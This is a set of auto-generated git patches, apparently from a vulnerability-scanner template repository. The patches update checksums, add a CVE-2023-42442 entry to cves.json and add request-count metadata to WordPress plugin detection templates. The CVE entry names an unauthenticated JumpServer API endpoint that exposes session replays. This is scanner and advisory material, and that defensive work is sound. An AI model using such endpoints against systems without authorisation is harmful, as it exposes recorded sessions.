+helpers/wordpress/plugins/meta-box.txt:17358dc21f97cd982510de77bcdadcaf77ef5371
 helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0
-helpers/wordpress/plugins/newsletter.txt:96a20c8da2810939fa60d2647f8273c2251ad539
-helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655
+helpers/wordpress/plugins/newsletter.txt:8179f6751c646b7c3f539243147306a43ca806f3
+helpers/wordpress/plugins/nextend-facebook-connect.txt:4be1dfbb67ef8087f7232dac0ed90c2603a22047
 helpers/wordpress/plugins/nextgen-gallery.txt:7ca6257a3f05a3a6b604fd5dae8af8c1b41b8e0f
 helpers/wordpress/plugins/ninja-forms.txt:8cef662de77623514d4c94b20aeef22a56a8f137
 helpers/wordpress/plugins/ocean-extra.txt:595d550379b2cb8bccb9659627308ff4e751d23f
@@ -491,7 +491,7 @@ helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6
 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe
 helpers/wordpress/plugins/post-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7
 helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b
-helpers/wordpress/plugins/premium-addons-for-elementor.txt:fba90fa57ee2b5dbb2faec1c33e96813ccb14fd5
+helpers/wordpress/plugins/premium-addons-for-elementor.txt:9c6ca999d3234cd57bafd8ca5b256f4b8fbe2d44
 helpers/wordpress/plugins/pretty-link.txt:eedf6a14348e4bc362e215e4dcd1e066e0bd16f7
 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e
@@ -504,10 +504,10 @@ helpers/wordpress/plugins/sg-cachepress.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d368
 helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4
 helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3
 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e
-helpers/wordpress/plugins/simple-custom-post-order.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6
+helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b
 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd
 helpers/wordpress/plugins/siteguard.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410
-helpers/wordpress/plugins/siteorigin-panels.txt:fc4929308af8b80845b3c743a30013a669a02875
+helpers/wordpress/plugins/siteorigin-panels.txt:730624dbf2fc592d5ae0f0918a50838ff9d2185b
 helpers/wordpress/plugins/smart-slider-3.txt:2cddd46563a1ae6eca28eb577f99025fd04568f2
 helpers/wordpress/plugins/so-widgets-bundle.txt:c6d5ac7140dfb0d87b85cbf9a9ae5e18202f1872
 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53
@@ -540,7 +540,7 @@ helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:7035802a8f118b141c54f97
 helpers/wordpress/plugins/woocommerce-payments.txt:f6f8ec8cee0642425740179c78f2bf7d0a6572f1
 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0
 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87
-helpers/wordpress/plugins/woocommerce-services.txt:17b06b2486a051055e43ae1127e87196d505e2f3
+helpers/wordpress/plugins/woocommerce-services.txt:440a9edb1796d0cd5f2d71aea1a74af81b05abbd
 helpers/wordpress/plugins/woocommerce.txt:dfaff11acbd25d0758b7c5294b4ff9d37debac19
 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da
 helpers/wordpress/plugins/wordfence.txt:40784b4a67e4ba8b48f28ea24427fa8550433cc1
@@ -2651,6 +2651,7 @@ http/cves/2023/CVE-2023-39677.yaml:daf8c05e33f87e1b63ab7d55a6a05773034db0ac
 http/cves/2023/CVE-2023-4173.yaml:6b300087c13e3a095031bc1a2d0f8d8590f1a6d8
 http/cves/2023/CVE-2023-4174.yaml:d2cf616712e64eea743b6c401fbfd482418ec12e
 http/cves/2023/CVE-2023-41892.yaml:e042c550adbe64454aea30c413ded1b9d7a72814
+http/cves/2023/CVE-2023-42442.yaml:c6e765cc76d6e24c920ac246e83837e68011c2fd
 http/cves/2023/CVE-2023-4568.yaml:a40438e923a862215d522cfad6534b0fb3374249
 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
 http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042
@@ -5938,7 +5939,7 @@ http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18
 http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
 http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
 http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf
+http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
 http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
 http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
 http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
@@ -7185,7 +7186,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:b768fe595ef4ee6df797943aaa03a8cfd1cec5a2
+templates-checksum.txt:9a08d6ff1213329cdf6a86542c0586417e055cfd
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From dd418efbf245de1cfc3a7fd21e184cc46a808a5f Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 21 Sep 2023 04:25:24 +0000
Subject: [PATCH 0469/1090] Auto Generated cves.json [Thu Sep 21 04:25:24 UTC
 2023] :robot:

---
 cves.json              | 1 +
 cves.json-checksum.txt | 2 +-
 2 files changed, 2 insertions(+), 1 deletion(-)

diff --git a/cves.json b/cves.json
index 2273a85a8e..345f08673b 100644
--- a/cves.json
+++ b/cves.json
@@ -2026,6 +2026,7 @@
 {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
 {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
 {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
+{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"high","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
 {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
 {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
 {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 29e238f4cf..cae8c9ecad 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-f35b1f6581b1288e40a215fcaffdf901
+06a0dcbc6f141f351e8959dd6763a46a

From ceefb1f9630b66349ead7e38e43431f3923fce94 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 21 Sep 2023 04:25:45 +0000
Subject: [PATCH 0470/1090] TemplateMan Update [Thu Sep 21 04:25:45 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
